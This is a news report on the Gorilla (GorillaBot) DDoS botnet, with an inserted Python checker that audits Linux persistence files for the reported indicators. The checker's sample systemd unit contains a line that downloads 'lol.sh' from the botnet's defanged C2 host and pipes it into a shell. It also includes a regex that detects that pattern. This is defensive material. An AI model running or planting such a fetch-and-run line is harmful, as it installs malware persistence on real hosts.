Cybersecurity researchers have discovered a new family of botnet malware called Gorilla (aka GorillaBot) that is a variant of the leaked Mirai botnet source code.
Cybersecurity firm NSFOCUS, which discovered the activity last month, said the botnet “issued more than 300,000 attack commands with shocking attack density” between September 4 and 27, 2024. On average, at least 20,000 commands designed to carry out distributed denial-of-service (DDoS) attacks were issued by the botnet each day.
The botnet is said to have targeted more than 100 countries, attacking universities, government websites, and the telecommunications, banking, gaming and gambling sectors. China, the U.S., Canada and Germany were the most attacked countries.
The Beijing-headquartered company said Gorilla mainly uses UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood and ACK flood to conduct DDoS attacks, adding that the connectionless nature of the UDP protocol allows arbitrary spoofing of source IP addresses to generate large amounts of traffic.
In addition to supporting multiple processor architectures such as ARM, MIPS, x86_64, and x86, the botnet provides the ability to connect to one of five predefined Command and Control (C2) servers to await DDoS commands.
In an interesting twist, the malware also embeds functionality to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution. It should be noted that the flaw was abused in the wild as early as 2021, according to reports from Alibaba Cloud and Trend Micro.
Host persistence is achieved by creating a service file called custom.service in the “/etc/systemd/system/” directory and setting it to start automatically every time the system starts.
The service, for its part, is responsible for loading and executing a shell script (“lol.sh”) from the remote server (“pen.gorillafirewall(.)su”). Similar commands are also added to the “/etc/inittab”, “/etc/profile” and “/boot/bootcmd” files to load and run the shell script at system startup or user login.
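The persistence locations above are cheap to audit on a Linux host. The following Python checker is an added example, not code from NSFOCUS or from the write-up: it reads the four files named in the report, flags the indicators the report quotes (the `lol.sh` loader and the `gorillafirewall` C2 host), and also generalises to any download-piped-to-shell command in those files, since a rebuilt sample would change the names but not the pattern. The sample file contents are constructed for the demonstration, with the host kept in the report's defanged form.

```python
import re
from typing import Dict, List, Tuple

# Persistence locations named in the NSFOCUS write-up: a systemd unit called
# custom.service plus start-up hooks in inittab, profile and bootcmd.
PERSISTENCE_FILES = (
    "/etc/systemd/system/custom.service",
    "/etc/inittab",
    "/etc/profile",
    "/boot/bootcmd",
)
# Indicators quoted in the report: the loader script name and the C2 host.
INDICATORS = ("lol.sh", "gorillafirewall")
# Generalisation: a remote script fetched and piped straight into a shell is
# worth flagging in a boot/login hook even when the names change.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b[^|;\n]*\|\s*(sh|bash)\b")

def scan_text(path: str, text: str) -> List[Tuple[str, int, str]]:
    """Return (path, line_no, reason) findings for one file's contents."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for ioc in INDICATORS:
            if ioc in line:
                findings.append((path, no, f"indicator '{ioc}'"))
        if FETCH_AND_RUN.search(line):
            findings.append((path, no, "download piped to shell"))
    return findings

def scan_files(contents: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """Scan an in-memory {path: text} map restricted to the known locations."""
    out = []
    for path in PERSISTENCE_FILES:
        if path in contents:
            out.extend(scan_text(path, contents[path]))
    return out

def scan_host() -> List[Tuple[str, int, str]]:
    """Read the persistence files from the live system (missing ones are skipped)."""
    contents = {}
    for path in PERSISTENCE_FILES:
        try:
            with open(path, errors="replace") as fh:
                contents[path] = fh.read()
        except OSError:
            continue
    return scan_files(contents)

# Constructed sample resembling the persistence described (host kept defanged).
SAMPLE = {
    "/etc/systemd/system/custom.service": "[Unit]\nDescription=custom\n[Service]\n"
        "ExecStart=/bin/sh -c 'wget -qO- http://pen.gorillafirewall(.)su/lol.sh | sh'\n"
        "[Install]\nWantedBy=multi-user.target\n",
    "/etc/profile": "export PATH=$PATH:/usr/local/bin\n",
}

if __name__ == "__main__":
    for finding in scan_files(SAMPLE):
        print(*finding)
```

Run `scan_host()` as root on a suspect box; an empty list means none of the four files references the quoted indicators or pipes a download into a shell.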
“It introduced various DDoS attack techniques and used encryption algorithms commonly used by the Keksec group to hide key information, while simultaneously using multiple methods to maintain long-term control over IoT devices and cloud hosts, demonstrating a high level of counter-detection awareness as a new family of botnets,” NSFOCUS said.